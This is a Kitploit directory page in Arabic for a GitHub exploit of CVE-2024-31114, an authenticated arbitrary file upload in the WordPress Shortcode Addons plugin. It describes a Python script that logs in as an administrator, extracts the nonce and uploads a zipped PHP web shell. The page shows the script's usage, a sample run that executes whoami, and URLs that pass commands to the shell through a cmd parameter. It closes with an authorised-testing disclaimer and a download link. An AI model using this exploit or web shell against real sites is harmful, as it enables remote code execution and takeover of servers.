Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/nxploited/cve-2024-31114
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubnxploited/cve-2024-31114

CVE-2024-31114

Shortcode Addons <= 3.2.5 - رفع ملفات تعسفي (مُصادَق عليه: مسؤول+)

عرض المستودع
2منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-31114 - WordPress Shortcode Addons RCE Exploit

Shortcode Addons <= 3.2.5 – رفع ملفات تعسفي للمستخدمين المصادق عليهم (Admin+)
CVE ID: CVE-2024-31114
CVSS Score: 9.1 (حرجة)


🛠️ وصف الثغرة

إضافة Shortcode Addons – مع Visual Composer و Divi و Beaver Builder و Elementor Extension في ووردبريس معرّضة لثغرة رفع ملفات تعسفي بسبب عدم التحقق من نوع الملف في جميع الإصدارات حتى 3.2.5 وما دونها.

تسمح هذه الثغرة للمهاجمين المصادَق عليهم بصلاحيات مستوى المسؤول أو أعلى برفع ملفات تعسفية إلى الخادم — مما قد يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE).


🚀 وصف السكربت

يقوم هذا السكربت المكتوب بلغة Python بأتمتة استغلال الثغرة. وهو يقوم بما يلي:

  1. تعطيل التحقق من SSL
  2. تسجيل الدخول باستخدام بيانات الاعتماد المعطاة
  3. استخراج رمز CSRF (_wpnonce)
  4. إنشاء شيل PHP (nxploit.php)
  5. ضغطه ورفعه كملف .zip
  6. تأكيد الرفع والوصول إلى الشيل
  7. تنفيذ الأمر whoami على الخادم الهدف

🧪 الاستخدام

root@kitploit:~
usage: CVE-2024-31114.py [-h] -u URL -un USERNAME -p PASSWORD

Shortcode Addons <= 3.2.5 - Authenticated (Admin+) Arbitrary File Upload
By: Nxploited | Khaled Alenazi

options:
  -h, --help            Show this help message and exit
  -u, --url URL         Target URL (e.g. http://target.com)
  -un, --username USERNAME   WordPress Admin Username
  -p, --password PASSWORD    WordPress Admin Password

📤 مثال على المخرجات

root@kitploit:~
[+] Authentication successful.
[+] _wpnonce extracted: 9d8dbbc630
[+] Payload nxploit.zip created.
[+] Payload uploaded.
[+] Shell is accessible at: http://target/wp-content/uploads/shortcode-addons/nxploit.php
[+] Command output:
------------------
www-data
------------------
[+] Temporary files removed.

🐚 استخدام شيل الويب

بمجرد رفع الحمولة، يمكنك تنفيذ أوامر النظام باستخدام الصيغة التالية:

root@kitploit:~
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=command

🔹 مثال:

root@kitploit:~
http://target/wp-content/uploads/shortcode-addons/nxploit.php?cmd=ls

سيؤدي هذا إلى عرض محتويات المجلد الحالي على الخادم.

⚠️ إخلاء مسؤولية

هذه الأداة لأغراض تعليمية واختبارات مصرّح بها فقط.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر يسببه هذا السكربت.

استخدمها بمسؤولية وفقط على الأنظمة التي لديك إذن صريح لاختبارها.


بواسطة: Nxploited | Khaled Alenazi

تنزيل الأداة